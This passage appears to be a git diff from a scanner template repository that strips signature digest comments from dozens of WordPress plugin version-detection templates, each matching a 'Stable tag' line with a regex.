b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004758cacd94489c539df7bcd3fa1626ba6c7cd3a80509dff7e89e5ca4ed7d5c502204784402b1772c9a40fce7910c677989c1a608c98fffbad50ab1a5a1c66ca69c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 635fb19875..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220075eddd198a0e36b8253c2853a629da597e1ec9d9532a9759620e26b2a0842fa022100d0fc034643c5bfaa10382514ffaf8550d37aa30a4d26795b9d97c09a333d5e2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 4af16d3b0f..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100901ed9e2e7d9090a0d11a0ffa2dc0058db094186164ec0d52df1a65a44b5429d02202189bcb35d05b0cf6e4154bf86a19c815d89e016f4a2f64f99b437adef855e2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 71b7a1fac1..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009778dc77478fda302087a3b8a3928fd9fd9741d0bb3f5cf06f2de6564e89c900220245e362e470823f780c04dbb3c5a4443116229d7b1c91b4b78d1d525d96e89f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 085d12dc8e..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3203e41cbba3d79e0410296ee7f1c47d8c5bbfe085c4ec0be07b487705f20580221009ce7d65e926377893ff1f7f2678a33ea0f01576e6fa3c381b004d77c7de2b6f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index b9430b59f7..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3fb31865bc72141cf6695f32894fd1d53da915ceb5431de53a8fc6d840511370221009e9f081a0791d77a9a13aa61715cbb72f7c48e3be8a99856785bf0c070b65c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 71b294dd1e..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6d9fd9729d4b3b64852279b3ea26c973dc6e958eb1b5048200f343775569766022069a07e0e767effbc94172af84a0c1f97b2df2d0409621c52639186d315156ff5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 698f292a30..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d58baac329ad5c2525350762b8eec79ffd12745982bf349a8cf51084f251ede7022100e32af8c540c06545560dfe6f3c6e17e1696e1f440fb01dfa5b20a0aec29f80a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 839fec392b..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058064a1380d09a7011f2f8bfa6c2db90e74c78b771d54948a92203385d4e903902203a625454bd115d8aa2220cdb76246040c54f1c718e18029b9ef0eb923959a3de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index ee3fa03a90..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206dbf07c20ccf5e4bef1188ef88ad106e9fd5c612b2917a5df8f1b6e2357a86f202210085f1d62ea08fd25b082c70666819a6b2fa1c2223ed9417e0d491685e9990e647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index f8e281f754..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8ac0e4787f89fb616f5d9a4daafd84a07781729e74b2417c763b41f139a60d402200c90557ce4bfef2997837ec772da38b08174f9253a38106f406dc765bdb2c2cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 1f879e78e6..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d93517d7c215de754410cb9054622d58905138a8f5e5de9bed51c3ed6f7666a02203bfcb94e3a1eea8290be9f7ddf17642210d7aaaf65c03ac19e73ec7e911ec93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 534a21bf08..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100936afa94d5a429befd8a0cde5de2cbeba7d589e094c23379093f6f13fd3b6e500220085a2c7bec046909690810b3cc3b6cb8a297e29be535716a8c65b31bd10c03fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 6a2e72e587..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b87b73b59388bd022c9270b1f828356702b9ae56f5ac4aa7843fc80e73cf7cc02210094144d40cd71b83aeb66d6ed3621010400200880fdc9042b2432be04cfd7b3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index d030872716..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022013d8fddcc5cdaedf056d997761c070e64f5e1b456d4ee8db2792bbbffa77c41802202a6a2d7caa4a13677fb0f9c4f93c2ae332e8616b4022d58e719581753b60512c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index b12cba79aa..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098195456c473bf80ae789fd88c5b5e5dd429b9a4bdcd1a00be1d976ab58087a902205b3bf4038eed8b62bbab25d37ab375d0722fdfbca5431ecb4360b7f803b8e4ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 7c795fb91b..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc7481de420c297ccf7cc2e35c526bfb9b3c506756a6d1fe69fdba2a8ccc1c6202205b319610857e97d7f3edaab8821ebe57bf713a8f10763e2dd541a12f80856f66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index c805a86901..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080cb6e5ba322ba0fd7af372761c8226ff4125bb9ff73c6bec8c6bcb5d4793aa5022021ceef476c67474c6d766fbd08e2869fec2c31e34e497ceb64f5faf28c42126e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index ba575aeb3f..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022028d8a68ebbb1a7285b11bb4644d2002a7c554d9077af336e021d9654917b3068022100f8e9eb0ff4ec20f403cdaab60e184570601248fca3366462717af87ba77c26d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 39286e5720..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205590495c7b1f3c28c5d7db184ee71fe1a24b7061a303d5ea116928e10b895d6f022100e06dc55d37597e81e26987cc22fa388bccb61df6d614ca3a264741d7b741b751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 2187640d4e..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e55d95924c19f904903500af60c51133f49bdc61783a130cdbc12b692dcb61c022100e87dfc5e85eb4ac01ec7fa4f21f4368954e68674e554d854d739f45786f870bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index f985f3ed49..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066c83c2e2422dd7154d2dbe7c3ec9df52e6744c90e8cf86dbcbe344b4b333eea022100c5176fddbae79ca8be66f6b48928e9a41b472591e579c66a7026e70b7ecf4bba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 55de4be9ac..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202af6f9f9b46718eefee31d4b1ddfbfbf4f755cb1491090dd8601d0c07b852734022100ca20628dec6a6ad748d403c0fa92b1bd4831d456efc8ad9a101a60d5a2539c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 86c12ed6a5..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e15e5634e385ba51c95ed8017dc93eb6ce911fa082608b6d8b76efc2fc31527302201d864919975a2eafb77f6d549018d73f98e2937583fca4d56eb0c94e61c92309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 550f9c2fd9..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206eee87e086f4ff8bc198c68070b2769411734b3a14cc2fbd593448c4bcdeee9e022100a1852116769bd3bde1fa4e471a8b29733f95162c155558c24d613d0f1039d5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 27461c1483..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f024335a785cd2181cd59699eaf6f24b6caa21ff8c52f2cbe3e4cca48d75577022100b0f3336db2bc3b64f880825b2fb8d166f42a0aa7fdce094cf4add635904c3399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 7a264fcc8e..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b7959534dd5604d486d358947b7f0d912dbd24ac4c8d8d68db4b7579a9b519a3022100a70e554b09de7e9bd88a2667d7fa5c346fb597676eddc3d442f947cb77e0d6f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 7d6caffd1f..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207ae0db23ed6fe3bf1b70569ef8ee6a5f1c3619511a99afc487b93dd899784e0a022036de37f62d4d0809d3b1bed2c6d8dd0bfc90d4f13000796eb9f2e24a6586ffdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 3888677058..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4cba128c5f88a3c5f2a99b38ddd84df85ee8300a55d39223f33337aae515286022100f0e7478c17a7575e0388b1fb44f88df7ef83dc08a1805f71e4ecec5cec0a8738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index cb6903a96c..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d34e37056edce60b39ffdb80ea0cf44382abec7e6017e5f2a107f3648fa821bc022100a9ad598b2cc2e51df9c629405d4046167caf896df3dfbc90e070597bfa2869eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index bdabf53edc..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205dd8c64823fc2750daa45cdb492eb5ca5e734f29d4b5f028d3db713e546d099a02201793a05bd1a95719fbbdb37631c9160102cb3d635d7ed1fad2eeec0e44b269c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 15e4b7583d..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d625362832b4b8b7dcbbd81a85f36eb974590371c6f427ec88c48579a9b58850022100d98907b440fa0aa81fcf7630bd3bd80f9ac4b95ce3c13cae2a87ceee45dc812e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index fb7c3bdb94..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023649d859a6f0230a3a87a1ff7f75f3cb267b9b6e586d98cbd06f68b7150090c02201de0cf8ebd944ae40420b620ff4a43f0c8d265828df0cc2ba948d2142d34a6a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2e9295d78c..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d7c38336139fbf06d9275e71792446baa3a15e313d0a839c184860102cc7597022000f6bfc3d372ca9c5b5c5a4a6ed72f1e3db858f973fae568fa023ec9f8c23491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 802b39afeb..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c97643a613746e1ae8a46cac191a865b91cc86c6167465275dac4a8d44c664f0220067fc9dccffaeb1d218c8cc3e8a1856a7b8cee0731d9918f6f7857b8e53a3f74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index b719ccc11b..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb22d1720c5f909a631f3911f7137a7cb0b74369dbd91797fc30dab4ae53ee33022007081ab15df2ba7bd65e719219b50d60cc52b9634fcdcdc37fefd74969f942d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 19e7517c46..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c4514e2c2c9fd4977bccb716a30e8307d496a670baa73f4cc2b7fb833361be15022100a7e9f327dbfc2e485ecd276e9964f02872437133130e7093427251397ed8e5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 4da79e6e92..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204cca94d60b720b1336a9501d0683b77a37a2e7a935ddcb5a849f6ad176436c94022100bba7c54c69a688f926bc877114009a5587c153c54a1ed0108909ac91169f885a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 69bcdaab01..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d7b61a63a98f7e85456b513cbb62ed81f673951b1d462dd66017f71acf922530022100ab4e2a85f7efd4bfb5e0e7031e8f677650a5971730c93c823d603a091b3e4e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index aedf82d0b1..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003b4f678edb6b182ca9bc8f853e66e3c08cedbc0b9b55ee6c8752aa89361be2b02203592f402660f69d1254cf5f57a63122122663e44276cc7b4ad9c9ca0e013e542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 3ea002bd93..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a25b6661bb321ed8e61b686ce743c861ed7db82c6ef1f3b9bcc7cddafb14fef02210093be0a66c60481d87d0ad00faff6935d1460d1a21ad8fc55d44d26ef754da20c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index ddecc14133..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f87beece6d0c535c155cdd316407e57737a836e67514da8d4f8495c5192467d902204b54d7d8cec999091d61eaf448decf5f8b3010907771bb907a4a39876b473616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 03193bf765..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa10e5086ff5ac6981b74e924475ea149ee68738a6f119a19172cebba510ec3e022100d53459f4d0373f39343be110abcbf0f26635e0778f0e3f2185fef579a2dac710:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index a9def8f46e..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f91320cbb0e9e63001e2dc9761068f4ad2cd377a0b5c9156967dade8b733328102202fecd03a4046bdb11f4a1eca525140747ceeb61789c69670514133ba44c217b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 05cb2f2349..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203db124588b0c2f47fa5a181b0cc5f80d92a8a00f56cb501ed5659683cf80c2a7022100d0e4e2da992ff314bcf170aa23a95b53e278f9ce4c14d7a0fc85f467d0c9a686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index d43bc2e4d6..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b182c960758263abf629cd1503657de4c7fce1110d8ecdfe7b2351188db60808022100a4e294c5da82d83ddb56425cc8f45fe5e9a39fb7c6a706a47f26c0cf013ee7f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index b5b4d8b62b..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 